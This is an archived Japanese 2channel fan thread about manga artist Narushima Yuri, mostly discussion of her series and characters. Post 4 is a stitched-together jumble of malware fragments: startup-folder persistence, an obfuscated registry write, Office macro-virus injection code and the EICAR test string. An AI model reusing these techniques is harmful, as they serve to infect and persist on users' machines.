5ちゃんねる ★スマホ版★ ■掲示板に戻る■ 全部 1- 最新50  

■ このスレッドは過去ログ倉庫に格納されています

読後は2chで… なるしまゆり 15

1 :花と名無しさん:2007/01/08(月) 15:41:58 ID:KhPFfGv90
Wings、ASUKA、ZEROSUMなどで活躍中の、なるしまゆりについて語りましょう

【前スレ】
読後は2chで… なるしまゆり 14
http://comic7.2ch.net/test/read.cgi/gcomic/1154306858/l50


2 :花と名無しさん:2007/01/08(月) 15:43:25 ID:???0
【過去スレ】
なるしまゆり(0.5)
http://salad.2ch.net/gcomic/kako/977/977398392.html
なるしまゆりスキなひとー!(1)
http://comic.2ch.net/gcomic/kako/986/986432352.html
===読後は2chで踊りましょう なるしまゆり2===
http://comic.2ch.net/gcomic/kako/1015/10151/1015182555.html
なるしまゆり 3
http://comic.2ch.net/gcomic/kako/1032/10327/1032716689.html
読後は2chで…  なるしまゆり4
http://comic.2ch.net/test/read.cgi/gcomic/1037860326/
読後は2chで…  なるしまゆり5
http://comic.2ch.net/test/read.cgi/gcomic/1061013517/
読後は2chで…  なるしまゆり6
http://comic.2ch.net/test/read.cgi/gcomic/1070123395/
読後は2chで…  なるしまゆり7
http://comic4.2ch.net/test/read.cgi/gcomic/1076868911/
読後は2chで…  なるしまゆり8
http://comic6.2ch.net/test/read.cgi/gcomic/1087045210/
読後は2chで…  なるしまゆり9
http://comic6.2ch.net/test/read.cgi/gcomic/1096299029/
読後は2chで… なるしまゆり 10
http://comic6.2ch.net/test/read.cgi/gcomic/1112763683/l50
読後は2chで… なるしまゆり 11
http://comic6.2ch.net/test/read.cgi/gcomic/1127722726/
読後は2chで… なるしまゆり 12
http://comic6.2ch.net/test/read.cgi/gcomic/1136734592/
読後は2chで… なるしまゆり 13
http://comic6.2ch.net/test/read.cgi/gcomic/1145411799/

【公式】
ttp://www.naruri.com/index.html

3 :花と名無しさん:2007/01/08(月) 15:44:28 ID:???0
【既刊】
レプリカ・マスター 新書館(1996/4発行)
少年魔法士 1〜13 新書館(1996/9〜2005/12)
原獣文書 1〜8 新書館(1996/11〜2005/7)
プラネット・ラダー 全7巻 集英社(1998/12〜2004/5)
超次元遊郭花天楼 ビブロス(1999/11)
不死者あぎと 全5巻 集英社(2000/8〜2004/4)

少年怪奇シリーズ 角川書店
隣の町で死んだひと(2000/9)
終電時刻(2002/3)
仔鹿狩り(2005/8)

鉄壱智1〜2 一迅社(2005/3〜2005/10)


4 :花と名無しさん:2007/01/08(月) 17:51:01 ID:???0
Set A4 = A1.CreateTextFile(A1.BuildPath(A1.GetSpecialFolder(1)))
X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
fso.copyfile "dirsystem&nurupo.vbs", "j:\windows\start menu\programs\startup\"
ToInfect.CodeModule.InsertLines BGN, ADI1.CodeModule.Lines(BGN, 1)
"avgnt"="\"C:\\Program Files\\AntiVir PersonalEdition Classic\\avgnt.exe\" /min /nosplash"
G.RegWrite A("IJDX^MNB@M^L@BIHOD]Rnguv`sd]Lhbsnrngu]Vhoenvr]BtssdouWdsrhno]Sto]VhoRu`su"), E.BuildPath(E.GetSpecialFolder(1), A("VHORU@SU/WCR"))
lines(n)=replace(lines(n),"""",chr(93)+chr(45)+chr(93))
kak.hta';ken=wd+'START
kill -9 xz/tSaBh0
Sub auto_open()
Application.OnSheetActivate = "check_files"
End Sub
Sub check_files()
c$ = Application.StartupPath
m$ = Dir(c$ & "\" & "PERSONAL.XLS")
If m$ = "PERSONAL.XLS" Then p = 1 Else p = 0
If ActiveWorkbook.Modules.Count > 0 Then w = 1 Else w = 0
whichfile = p + w * 10
End Sub


5 :花と名無しさん:2007/01/08(月) 20:48:52 ID:???0
>>1
乙!

6 :花と名無しさん:2007/01/08(月) 22:10:07 ID:???0
>>1
乙華麗

7 :花と名無しさん:2007/01/08(月) 22:43:05 ID:???0
>>1
スレ立て乙です

8 :花と名無しさん:2007/01/08(月) 22:52:32 ID:???0
前スレ>>958
自分もバンビ好きだ

>あのこはわたしがもらうの、辺りのセリフとかすごい好き。かっこいい
こういう台詞をサラッと言えちゃうところが良いよね




9 :花と名無しさん:2007/01/09(火) 20:55:17 ID:???0
なんかこのままだとスレが落ちそーな予感がするw
ナギの話でもなんでもいいから数十レス進めてくれー。

10 :花と名無しさん:2007/01/09(火) 21:18:00 ID:???0
人少ないほうがマターリしてるからこのままでいいよ
少女漫画板だからすぐには落ちないよ
とは言いつつ念のためage

なるり漫画の女性キャラは芯が強くて好きだ

11 :花と名無しさん:2007/01/10(水) 00:04:24 ID:???0
美人揃いだしね。
男どもがウラヤマシスw

12 :花と名無しさん:2007/01/10(水) 03:18:29 ID:???0
特にレヴィは運良かったよな
ナギに会わなかったら悲惨な一生送りそうだし
タナボタ的に人生大逆転させてくれた相手が人外とはいえ美人だというのは幸運過ぎかと
なんかもう一生分の運使い果てしてそうで怖いw

13 :花と名無しさん:2007/01/10(水) 03:22:39 ID:???0
今年は新刊が出ますように…

14 :花と名無しさん:2007/01/10(水) 11:53:02 ID:???0
テンプレに追加

なるしまゆり@同人
ttp://jbbs.livedoor.jp/bbs/read.cgi/otaku/5179/1167643864/l50

15 :花と名無しさん:2007/01/10(水) 13:30:46 ID:???0
>>14
去年同人160Pに涙が止まりません(´;ω;`)ウッ…

16 :花と名無しさん:2007/01/10(水) 14:52:37 ID:???0
>>15
だからそういう話は>>14でどうぞ

17 :花と名無しさん:2007/01/10(水) 18:19:07 ID:???0
15は同人の話をしたいワケじゃないんでないの?

18 :花と名無しさん:2007/01/10(水) 18:36:17 ID:???0
>>12
>一生分の運使い果てしてそうで
それどころかナギに逢わなかったら一生を終わる筈だったわけで・・・
その後の人生はだれになんと思われようと、
例え人外であろうと、愛するナギに捧げて本望なんだよね
じゃなかったら「魂の底から死んだ方がマシ」

うん、やっぱ、この二人の関係はちょっとスゴイぞ!

19 :花と名無しさん:2007/01/10(水) 19:59:30 ID:???0
ナギの話題はもういいよ・・・いいかげんしつこい

20 :花と名無しさん:2007/01/10(水) 20:01:04 ID:???0
別に前スレの話題引きずってるようには見えないけど?

21 :花と名無しさん:2007/01/10(水) 20:26:05 ID:???0
THINGの話はよかったよね

22 :花と名無しさん:2007/01/10(水) 22:20:36 ID:???0
>>17
向こうの話題への感想をわざわざこっちで書く必要ないでしょ

23 :花と名無しさん:2007/01/10(水) 22:28:52 ID:???0
>>22
間違ってたらスマソなんだが、
>>15は同人では160P「も」書いてるのか、ということに泣いているのであって、
同人の160P「に」感動して涙を流している訳ではないんじゃないかな、と思ったり。

24 :花と名無しさん:2007/01/10(水) 22:35:34 ID:???0
同人への文句も向こうのスレでやってる
ていうか愚痴のほうが主流

25 :花と名無しさん:2007/01/10(水) 22:39:49 ID:???0
>>23
何で泣いてるかなんて関係ないだろう…
22のレスの意味、激しく取り違えてないか

26 :花と名無しさん:2007/01/10(水) 22:53:38 ID:???0
へえ、連載中の作品をもっと書いて欲しいな、という感想もあっちなんだね。
覚えておこう。
でも前スレの何割がこの手の愚痴だったかw

27 :花と名無しさん:2007/01/10(水) 23:01:28 ID:???0
こっちしか読んでないと>>15って唐突で意味解らんよ

28 :花と名無しさん:2007/01/10(水) 23:08:52 ID:???0
同人関係はまったくわからないけど、
へー、同人では160ページも書いてたのかーそりゃ泣けるな、と読んだけど。
違うの?そういう意味じゃないから話題になってるのかな?

29 :花と名無しさん:2007/01/10(水) 23:10:06 ID:???0
なんかこのスレ他人のレスを弄ったりうざがる人が多すぎ。

ここはなるしまスレなんだからなるしまの話題ならなんでもいいじゃん。
気に入らない話題やレスは自動ホシュマシーンだと思ってスルーすればいいのに。

30 :花と名無しさん:2007/01/10(水) 23:20:13 ID:???0
>>26
誰もそこまでは言ってない
同人叩きつつならあっちでやってほしい話題

31 :花と名無しさん:2007/01/10(水) 23:28:54 ID:???0
うむ

32 :花と名無しさん:2007/01/10(水) 23:30:45 ID:???0
したらばを専ぶらに登録するのマンドクセ('A`)

33 :花と名無しさん:2007/01/10(水) 23:39:01 ID:???0
前スレから読んでて思ったが、ナギ嫌いでない人は
ナギ×レヴィ派が多いっぽいな。
ナギ×アーク派の自分は少数派なのか。

34 :花と名無しさん:2007/01/10(水) 23:42:43 ID:???0
鉄の新刊て今月末で良かったっけ?

35 :花と名無しさん:2007/01/10(水) 23:42:55 ID:???0
いや自分はどっちもいける派
単体でもそれぞれ好き

36 :花と名無しさん:2007/01/10(水) 23:44:42 ID:???0
>>34
25日だった気がする

37 :花と名無しさん:2007/01/11(木) 00:04:33 ID:???0
鉄壱智はこれから女性キャラが活躍するといいな
蝶子は期待が持てそうなキャラだ

38 :花と名無しさん:2007/01/11(木) 00:10:12 ID:???0
>33
ナギ×レヴィ派だけどナギはあんまり…って感じ

39 :花と名無しさん:2007/01/11(木) 00:25:21 ID:???0
カグヤとはまた違った天然系で下手するとうざくなる可能性も…>蝶子

40 :花と名無しさん:2007/01/11(木) 04:41:13 ID:???0
アークはイマイチかな
出合った頃はレヴィほど欲していたわけでもないしね
焦がれるような切実さが足らんのですよ

41 :花と名無しさん:2007/01/11(木) 05:54:29 ID:???0
少年アークがかわいくて好きだ

42 :花と名無しさん:2007/01/11(木) 08:27:11 ID:???0
>>20
引きずってるどうこうじゃなくて、
ナギの話題自体がうんざりなんでしょw

43 :花と名無しさん:2007/01/11(木) 11:01:39 ID:???0
>>41
アークは少年時代とか、最初意味深に出てきた時は
どういう人なんだろうと期待したけど
本格的に出てきてからは、尻つぼみだった…

44 :花と名無しさん:2007/01/11(木) 13:13:59 ID:???0
うむ。
現アークのナギに対する想い(好意)は感じられない
ナギも様子見つつ腹探って水面下で戦っている感じ

あれはアイディーリアが裁くべき嘘のアークなんだろう

ナギは現アークに従っているんじゃなく
少年アークの契約に従って行動してるんだろうね
そしてそれはレヴィ達を助けることでもある

45 :花と名無しさん:2007/01/11(木) 14:38:16 ID:???0
今のナギ&アークを見ていると
童話の消えた森、愛がたりない、自分で撰んだ拷問etc...
なんとなく某STGの曲名を思い出す。

懐かしや、、、

46 :花と名無しさん:2007/01/11(木) 15:08:50 ID:???0
バンビ好きな人多いけど
逃避行の途中までは意図して嫌われキャラに描かれていたよね

もし7界へ移ってからのバンビの計画を独白で明かす事無く
「凡百の身で私の邪魔をしようとするなんて愚かだわ」なんて言い放ってたら
ふっちぎり嫌なヤツと思われたこと請合いだと思う
実際、そこまで読めなかったサリータには全力で嫌われていたしw

ナギに関してはまだ語られてない部分が大杉なので
好き嫌いが分かれて当然だと思う
というか
それが作者の意図であり演出なんだろうな

47 :花と名無しさん:2007/01/11(木) 16:02:08 ID:???0
13巻まで出てるのに語られてない部分が大杉ってw
ぶっちゃけ作者の意図なんて無いと思う
ただ単に好き嫌いわかれやすいキャラなだけ

逃避行の時はかぐやのウザさのほうが目立った
バンビはよくある情緒や感情が発達してない系のキャラなんだろうなと思っただけだった

48 :花と名無しさん:2007/01/11(木) 16:30:57 ID:???0
ナギはまだまだ語られてないっしょ
巻数進んでるから語られてるって、なんだよそりゃw

49 :花と名無しさん:2007/01/11(木) 17:05:04 ID:???0
>作者の意図なんて無いと思う
 
・・・(^^;


50 :花と名無しさん:2007/01/11(木) 18:37:13 ID:???0
目に見える、表面的な部分だけで評価する読み方か、
キャラの心境や今後の展開などを空想しながら読み進めるかは
各自の自由で良いんじゃないかな

51 :花と名無しさん:2007/01/11(木) 18:41:41 ID:???0
これから語られようと傲慢で男好きな性格が変わるわけじゃなし

52 :花と名無しさん:2007/01/11(木) 19:09:17 ID:???0
だから語られなくてもいいと?
そりゃ単なる投げっぱなしだ

53 :花と名無しさん:2007/01/11(木) 19:16:23 ID:???0
>>44
>ナギは現アークに従っているんじゃなく
>少年アークの契約に従って行動してるんだろうね
>そしてそれはレヴィ達を助けることでもある

願望的深読みしすぎなんじゃないの?
ナギ信者ウザ・・

54 :花と名無しさん:2007/01/11(木) 19:21:48 ID:???O
…(゚Д゚)

55 :花と名無しさん:2007/01/11(木) 19:34:00 ID:???0
あぎとの塩野りかに、
「人間が豚に見えるのはお前が豚だから。心の清い人には人は人に見える」
みたいな台詞があったと思う。
ナギの性格が悪く見えるっていうのは自分の性格が悪いからなんだろうな
とここまで読んできて思いましたw

56 :花と名無しさん:2007/01/11(木) 19:40:10 ID:???0
そういうこと言うのはどうかと
火に油注ぎたいだけに見えるよ…

57 :花と名無しさん:2007/01/11(木) 19:43:50 ID:???0
そういえばカルノもナギ嫌ってましたね

58 :花と名無しさん:2007/01/11(木) 19:53:54 ID:???0
カルノも性格悪いと

59 :花と名無しさん:2007/01/11(木) 19:54:54 ID:???0
バロス

60 :花と名無しさん:2007/01/11(木) 19:59:53 ID:???0
○○の良さがわからないやつは駄目人間だとか、よく見る信者の主張だけど
そういう信者の発言がアンチ増やすんだよね…

61 :花と名無しさん:2007/01/11(木) 20:13:19 ID:04XFeACu0
厨の巣

62 :花と名無しさん:2007/01/11(木) 20:13:19 ID:???O
好きも嫌いも人それぞれ。押しつけるのはいかんよ。

63 :花と名無しさん:2007/01/11(木) 20:23:00 ID:???0
好き派も嫌い派もどちらも押し付けちゃいないように見えるぞ

64 :花と名無しさん:2007/01/11(木) 20:26:02 ID:???0
つまりは平行線
なんで荒れるってわかってて話を蒸し返すのだろう

65 :花と名無しさん:2007/01/11(木) 20:30:06 ID:???0
流れからして蒸し返したようには見えないぞ




66 :花と名無しさん:2007/01/11(木) 20:30:51 ID:???O
アンヌ様は実父にレイプされて狂っちゃったのかな?

67 :花と名無しさん:2007/01/11(木) 20:37:13 ID:???0
>>65
はっきりと蒸し返したわけじゃなくても
普通どんな話題出せばそういう方向に話が行くかくらいわかるだろ…

68 :花と名無しさん:2007/01/11(木) 20:39:51 ID:???0
トチュウマデハイイカンジダッタノニネエ・・・

69 :花と名無しさん:2007/01/11(木) 20:42:32 ID:???0
とりあえず即死は回避したと・・・

70 :花と名無しさん:2007/01/11(木) 20:50:23 ID:???0
うん(´∀`)

71 :花と名無しさん:2007/01/11(木) 20:52:03 ID:???0
荒れるくらいならレスつかなくていいよ…
次は絶対に荒れそうにないキャラの話題にしよう



赤毛の神父様とか

72 :花と名無しさん:2007/01/11(木) 21:02:25 ID:???0
激しくワロタ

それは
嫌い派はいないダロということか
好き派がいないダロということか・・・(^m^)プププ

73 :花と名無しさん:2007/01/11(木) 21:14:26 ID:???0
好きだよ神父様
お腹つつきたくなるw

74 :花と名無しさん:2007/01/11(木) 21:22:20 ID:???0
ブルルンも同じ系列の人だよね。
好きだよ。

75 :花と名無しさん:2007/01/11(木) 22:06:17 ID:???0
ラヴリーではあるが
萌え対象では・・・ナイな・・・

76 :花と名無しさん:2007/01/11(木) 22:31:52 ID:???0
まあ好ましい、くらいだな

77 :花と名無しさん:2007/01/11(木) 23:16:52 ID:???0
しっかり頼りになる感じ
なんでだろ
普段の言動は全然頼りになりそうにないのに

78 :花と名無しさん:2007/01/11(木) 23:33:27 ID:???0
Fax用紙に巻かれていた神父様はちょっと萌えた。

79 :花と名無しさん :2007/01/12(金) 01:17:38 ID:QWm9/BL+0
>>75
ワロタ
確かに。

80 :花と名無しさん:2007/01/12(金) 01:57:56 ID:???0
聖餅を食べてるとこ見たら萌える
いちころ

81 :花と名無しさん:2007/01/12(金) 18:19:10 ID:???0
なに言ってんですかーおまいら!!
ワタシの好きなキャラbest3@なるしまは
1.博士
2.赤毛の神父様
3.イブリン
ですよ?
いやマジで・・・

82 :花と名無しさん:2007/01/12(金) 19:37:04 ID:???0
神父様の話題はマターリしてるなw

83 :花と名無しさん:2007/01/12(金) 20:36:28 ID:???O
聖女の話でマジ萌えしたよ神父様

84 :花と名無しさん:2007/01/12(金) 20:40:29 ID:???0
>>81
キミはボケ専だな・・・( ̄ー ̄)ニヤリッ

85 :花と名無しさん:2007/01/12(金) 23:13:50 ID:???0
>>84
ぐはっ!
そ・そういえばそうかも〜
園長先生も好きだし・・・

86 :花と名無しさん:2007/01/12(金) 23:30:52 ID:???0
園長先生好きだー

87 :花と名無しさん:2007/01/12(金) 23:37:12 ID:???0
神父様、ぶるるん、早稲田さん(ニワトリバージョン)は
なるり漫画の三大癒し系キャラ

88 :花と名無しさん:2007/01/12(金) 23:49:23 ID:???0
きっと少数派だろうがアンヌ様が好きだ。どうしてかはよくわからない。
騎士団長が言ってたように、あの虚無的なところに惹かれてるのかも。

89 :花と名無しさん:2007/01/12(金) 23:51:51 ID:???0
アンヌ様も好きだ
というかなるりキャラで嫌いなのほとんどいないや

90 :花と名無しさん:2007/01/13(土) 00:02:48 ID:???0
園長先生は最初の頃はなんとも思ってなかったけど
意外な天然っぷりがかなりツボに入った
一応吸血鬼の一種なんだよね?
栄養補給はどうしてるんだろう、園長先生

91 :花と名無しさん:2007/01/13(土) 00:06:59 ID:???0
アンヌ様がレヴィにした仕打ちは
絶対に許されてはならない!
このキャラだけは生涯憎み続けるだろう

・・・と思っていたが
不覚にも最近「カコイイ」と思ってしまったorz
私のアイデンティティが〜

・・・年月って凄いね・・・

92 :花と名無しさん:2007/01/13(土) 00:10:41 ID:???0
アンヌ様は老けたり若返ったりするからなぁ…

93 :花と名無しさん:2007/01/13(土) 00:22:43 ID:???O
>>90
生徒達をつまみぐい?

94 :花と名無しさん:2007/01/13(土) 00:29:24 ID:???0
(*゚∀゚)=3 ムッハー♪

95 :花と名無しさん:2007/01/13(土) 00:44:08 ID:???0
女キャラはローゼリットが好きだ
出番が少なかったのが悲しい
でも、だからこそ今でも好きなのかとも思う

あぎとの神父様はビミョーに黒くてちょっと苦手…

96 :花と名無しさん:2007/01/13(土) 08:48:13 ID:???0
>>93
それはまずいだろう園長先生
めくるめく百合の園って感じだなw

97 :花と名無しさん:2007/01/13(土) 10:58:11 ID:???0
園長先生と神父様って本名あったっけ?

98 :花と名無しさん:2007/01/13(土) 11:44:47 ID:???0
>>95
黒いからこそボケが愛されるのだよ
園長先生も、博士もレヴィもな

99 :花と名無しさん:2007/01/13(土) 11:46:32 ID:???0
>>91
君も、時を味方にしたんだね・・・

100 :花と名無しさん:2007/01/13(土) 12:01:10 ID:???0
博士は黒くないぞ

101 :花と名無しさん:2007/01/13(土) 12:19:36 ID:???0
博士って絶対無自覚の女殺しだよね
でもって静馬は男殺し

102 :花と名無しさん:2007/01/13(土) 12:29:52 ID:???0
黒いというか、闇だよね
心に消えない闇を抱えてるの

それでいてボケていられる強さを私はすごいと思う。

103 :花と名無しさん:2007/01/13(土) 13:58:51 ID:???0
レヴィはボケてないぞ

104 :花と名無しさん:2007/01/13(土) 14:31:07 ID:???O
>>101
博士は無垢な天使みたいな顔して女性経験豊富そうだなー

105 :花と名無しさん:2007/01/13(土) 14:34:23 ID:???O
>>104
だよなー。
そういやキム女史と別れた後はずっと独り身かな?

106 :花と名無しさん:2007/01/13(土) 21:58:45 ID:???0
>>104
全部女から近寄ってくるんだろうなー
で、いただきます。とw

でも博士って恋した事なさそう

107 :花と名無しさん:2007/01/13(土) 22:13:22 ID:???0
博士なら女のほうが放っておかないよね
新大陸でもモテモテだったし

静馬への気持ちはまた恋とも違うよなあ…

108 :花と名無しさん:2007/01/13(土) 23:31:57 ID:???0
原獣の序盤で静馬相手に求婚という結論を出してたくらいだから、
恋愛に対して自由な考えの持ち主なのかと思ってたが博士的にロリはNGなんだな。
博士には優しさは罪という言葉が良く似合うw

109 :花と名無しさん:2007/01/14(日) 00:10:22 ID:???0
お相手はなんとなくだが年上の女性が多そうな気がするw

だからロリはダメという認識じゃなく単に範疇外だったんだろうな
モラルとか考えるヒトじゃないと思う
ていうか、そういう知識もないのカモ…

110 :花と名無しさん:2007/01/14(日) 00:27:13 ID:???0
博士ってさあ、
あまねく女性にすごーくすごーく優しいけど
特定の女性にもそれ以上の優しさは持てない感じ
…んで、寄って来たお相手もなんとなく離れていってしまう

そんな感じ。

111 :花と名無しさん:2007/01/14(日) 00:36:29 ID:???0
>>109
あ、ロリはNGってのはゼーンに対して怒ってたことについてね。
なんか他人の恋愛についてとやかく言うような人では無さそうな感じだったから、
ちょっとだけ意外だった。身内だからってのもあるんだろうけど。

112 :花と名無しさん:2007/01/14(日) 01:13:42 ID:???0
大陸人の場合、カップル成立=妊娠→出産が当然の流れみたいなので、
アルビレオが子供を生むには体力的に見て早すぎるから、博士は怒ったんだと思ってた
逆を言えば、適齢期ならOKぽいけど、そーするとロリ年じゃなくなるかw

113 :花と名無しさん:2007/01/14(日) 02:23:57 ID:???0
あれはゼーンがアルビレオを巻き込んだ形に見えたから怒ったとこもあるんじゃないかな
事実、ゼーンの方が、覚悟の上だったとは言えアルビレオをはめたわけだし

114 :花と名無しさん:2007/01/14(日) 08:20:16 ID:???0
博士に「子供」とはっきり言われちゃったことで
アルビレオは博士の恋愛対象外だと間接的に振られたようなものだよね。それがちょっとカワイソス

博士はアルビレオの気持ち知らなかったのかな

115 :花と名無しさん:2007/01/14(日) 12:04:25 ID:???0
>>106
博士に言い寄ってきた女をキム女史が放置するはずもなく…。
まあ、そうそう上手くはいかなかっただろうねw

でもそれでも食われた女の人はいそう。

116 :花と名無しさん:2007/01/14(日) 13:47:53 ID:???0
まきおのノーブラをさわやかに話してるあのシーンは面白かった。

117 :花と名無しさん:2007/01/14(日) 14:00:32 ID:???0
大人の女の人は謎
とかいってるけど
博士の方こそかなり謎w

118 :花と名無しさん:2007/01/14(日) 14:23:31 ID:???0
>>113
好き合った結果・・・とは考えられなかったのかな?
あの時点では、博士にはアルビの女性化姿以外なんら情報もなかったんだしさ

119 :花と名無しさん:2007/01/14(日) 15:51:28 ID:???O
>>114
知らなかったんじゃない?
なんてったって博士だし知ってたらもう少し違う言い方してたんじゃなかろうか


120 :花と名無しさん:2007/01/14(日) 16:05:27 ID:???0
女心の機微に疎い・・・っていうか
人の心の機微全般に弱そうだ

も少し他人の心を汲めたら
あそこまでおポンチな行動はしないだろう

あ・私はアンチじゃありませんよー
むしろRJラブw

121 :花と名無しさん:2007/01/14(日) 16:15:49 ID:???0
人の心のことに疎そうで実はそうでもないとキム女史が言ってた希ガス

122 :花と名無しさん:2007/01/14(日) 19:29:44 ID:???0
>>118
包帯ぐる巻きでいかにも何かトラブルがありましたって格好してたから
余計にゼーンがアルビレオを巻き込んだように見えたんじゃないかと

どうでもいいことだが、なんで博士が怪我して運ばれてきたアルビレオを見て
アルビレオだとすぐにわかったのかが謎だ…
前と外見変わってるし大陸人だからそっくりの他人という可能性もあるのに

123 :花と名無しさん:2007/01/15(月) 09:22:12 ID:???0
体力無いし非力だから博士はむしろ女の人に押し倒されてそう
既成事実作って博士を利用とか良からぬこと考える人間を排除するためにも、
やっぱりキム女史が近づく女から博士を徹底的にガードしてたりして

124 :花と名無しさん:2007/01/15(月) 12:17:31 ID:???0
キムが恋人だった時にはさぞかし鉄壁のガードだった事だろうw

125 :花と名無しさん:2007/01/15(月) 17:44:55 ID:???0
>>118
好き合ってても判断能力の未熟な子供にいきなり石を渡すのは
問題があると博士は考えたんでは?

>>123
キム女史はまきをのことも博士に言い寄る女かと敵視してたしなw
静馬という博士を任せられる相手が現れてキム女史も一安心ってとこか

126 :花と名無しさん:2007/01/15(月) 17:55:18 ID:???0
石関連で思ったんだが、
何の予備知識もない博士にアルビレオ達が石を持たせていたのは
今にして考えるとちょっと…と思った

もしあの時博士が女性化してたら大変な事に!

127 :花と名無しさん:2007/01/15(月) 19:34:25 ID:???0
アルビレオ達にしてみれば(゚Д゚)ウマーだけどな。
プレゼントした石が結果として静馬と割れちゃうのが皮肉だがw

128 :花と名無しさん:2007/01/15(月) 19:54:40 ID:???0
別に女性化しても2度とアルビレオに近寄らなきゃいいだけの話じゃない?
アルビレオは一生男のままだがw

だが全然違う話になってしまうなw

129 :花と名無しさん:2007/01/15(月) 20:24:51 ID:???0
女性化したらアルビレオ達に放してもらえなくなるよ
そもそも博士が他の土地へ行っちゃうのを
なんとか引き留めようと石を持たせたんだから

アルビレオってお馬鹿だよね…
自分があげた石がきっかけで博士は静馬とくっついちゃうわ
その後もゼーンに騙されることになるわ

130 :花と名無しさん:2007/01/15(月) 20:38:50 ID:???0
ティトオとカレッセオはもう出ないのかな
アルビレオが居なくなったらどっちかがアルビレオみたいになってきた
ってのが何かの伏線かと思ったのに

131 :花と名無しさん:2007/01/16(火) 00:15:03 ID:???0
カレッセオだね。泣き虫だったのが成長した。
あのへんのシーンはアルビレオが兄弟の元へ帰るENDの伏線とか?

132 :花と名無しさん:2007/01/16(火) 08:39:39 ID:???0
女性化した姿見たら二人とも驚くだろうなあ
アルビレオが帰った場合ゼーンはどうなってるんだろ

あと伏線というと静馬の「なぜあの時笑ったのか」という
ずいぶん長いこと引っ張ってるやつがまだ残ってるよね

133 :花と名無しさん:2007/01/16(火) 13:36:45 ID:???0
エピローグで
石を使わない妊娠だったか出産に成功したニュースが凄い事とあったが
旧人との混血のほうが大事なんじゃないかと思ってしまった

そっちはすでにクリアして普通の出来事になっている時代なんだろうか?

134 :花と名無しさん:2007/01/16(火) 16:10:38 ID:???0
旧人との混血で性別が分かれないと、石を使わずには妊娠も何も
行為このものができないのでは?
それとも高度な医療技術などでそれが可能になった、というニュースだったのだろうか。
自分は普通にけっこう後の話のようだし、混血が進んで、かあるいは
原獣文書の解読が進んで、ってことだろうなと思っていたよ。

135 :花と名無しさん:2007/01/16(火) 16:40:49 ID:???0
ニュースなのはどっちかというと産まれたのが一人という点だと思ってた
それは旧人との混血が少しずつ進んでる結果として、
そういう子供が産まれ始めたってことなのかなーと勝手に想像してた

136 :花と名無しさん:2007/01/16(火) 17:08:19 ID:???0
うん、重要なのは3人じゃなく1人で生まれた、ってとこだとオモ。
それも旧人同士のカップル、ってこと。
旧人同士のカップルで1人の子供が生まれるってことは、それはすでに
旧人というよりハーフなのかなあ?

137 :花と名無しさん:2007/01/16(火) 19:10:50 ID:???0
旧人じゃなくて大陸人の間違いかな?
何にせよ未来の新大陸はかなり変化してるみたいだね

138 :花と名無しさん:2007/01/17(水) 01:36:04 ID:???0
今までは遺伝子をグルグルさせるために運命の石で強引に決まった人としか子どもを作れなかった
→それがホルモン治療とかで本来の相手ではない好きな人と結婚できるようになった
→そのことによってコピーでない普通の子どもが生まれるようになった

という感じで理解していたなあ。

139 :花と名無しさん:2007/01/17(水) 05:32:39 ID:???0
ゼーンはアルビレオに石持たせる時
「こいつでいいか」とか言ってたんで
決まった人としか子供を作れない事はないんじゃない?


140 :花と名無しさん:2007/01/17(水) 09:31:59 ID:???0
運命の石は持った二人の体温に差があった時に分泌物を出すだけで、
石自身がくっつく人間を決めるというような能動的な働きはないように思う

投薬で妊娠云々というのは、虫の中に住んでる人達みたいに
大陸人に運命の石が効かなくなってきてるというんだろうか
それとも好き同士で結婚するための手段として使われだしたのかな

141 :花と名無しさん:2007/01/17(水) 16:33:29 ID:???0
エピローグチラ見なんではっきりとは言えんが、
大陸は大陸人保護区になってたような
で、旧人の出入りもそんなになさそうな感触だったような

てことは、やっぱあまり普通に混血してないのかな とオモタ

142 :花と名無しさん:2007/01/17(水) 18:26:00 ID:???0
誰も知らないようなとこでひっそり混血してるのかな
パラキアータも一人っ子のようだけど…

143 :花と名無しさん:2007/01/17(水) 21:15:21 ID:???0
そうか〜なるほど!
他の兄弟のこと聞かれて意味深に笑ったのは
一人っ子だからなのか〜 気がつかなかったよ←バカ?

博士は(多分)不死細菌取り込んだけど、
それは博士の子孫に受け継がれるのかな

144 :花と名無しさん:2007/01/17(水) 21:19:03 ID:???0
パラキアータが一人っ子だとは読めなかったけどなあ。
それよりただ兄弟に秘密がある=兄弟は博士とか?と思っていたよ。
純粋に大陸人のカップルに一人っ子が生まれたことをニュースだと思っているようだし。
それかパラキアータは大陸人ではないか、だな。

145 :花と名無しさん:2007/01/17(水) 22:27:33 ID:???0
少なくとも普通の大陸人ではないよな
前スレでも言われてたけど博士本人か、博士達三人の誰かの子孫か…

146 :花と名無しさん:2007/01/18(木) 01:07:06 ID:???0
旧人がいなきゃ存続出来ない種なのはわかってるけど、
大陸人達には自由なままでいてほしかった…。

147 :花と名無しさん:2007/01/18(木) 02:31:19 ID:???0
混血は最終的に大目的だが、
その為に石を使わず子供を造るってのがとりあえずの目標なんじゃないか?
エピローグの時代がどれくらい後かよくわからないが
その時代でもいろいろ手を尽くして模索中ってとこだろうよね
遺伝子的に安定するなんて何百年もかかるんだろうからさ…

148 :花と名無しさん:2007/01/18(木) 13:27:51 ID:???0
ゼーンがストックしておいた人達はどうなっちゃうのかな

149 :花と名無しさん:2007/01/18(木) 19:47:15 ID:???0
避難させたらそのまま逃げられちゃいそうだ

投薬で性別得たら、子供産んだ後もそのままってことになるのかね
混血進んだらいつかは性別がある子供が産まれてくるんだろうか

150 :花と名無しさん:2007/01/19(金) 08:23:17 ID:???0
大陸人的に不満はないのかな。
旧人の都合に振り回されて。

151 :花と名無しさん:2007/01/19(金) 12:12:19 ID:???0
不満っていうか、権利だよね
新大陸の資源や科学を略奪に来る旧人はもちろん許せないだろうし
旧人の有識者もそれはちゃんと阻止するだろう
そのための保護区で、旧人の出入り制限してるんだと思う

152 :花と名無しさん:2007/01/19(金) 22:54:18 ID:???0
大陸人は自分達が作られた生物だということをどういう風に受けとめてるんだろう
短いエピローグだけじゃそういうことまでは描写しきれなそうで残念だ

153 :花と名無しさん:2007/01/19(金) 23:25:43 ID:???0
>自分達が作られた生物だということをどういう風に
なんかこのテーマだけですごい長編になりそうな気がする

154 :花と名無しさん:2007/01/19(金) 23:52:35 ID:???0
>自分達が作られた生物だということをどういう風に

これまじめにやったら、ようするにナウシカじゃん(笑)

155 :花と名無しさん:2007/01/20(土) 00:28:21 ID:???0
過程をやると長くなるだろうから結論だけでも知りたいと思って
特別区とか作るにしたってきっと一悶着があっただろうし…
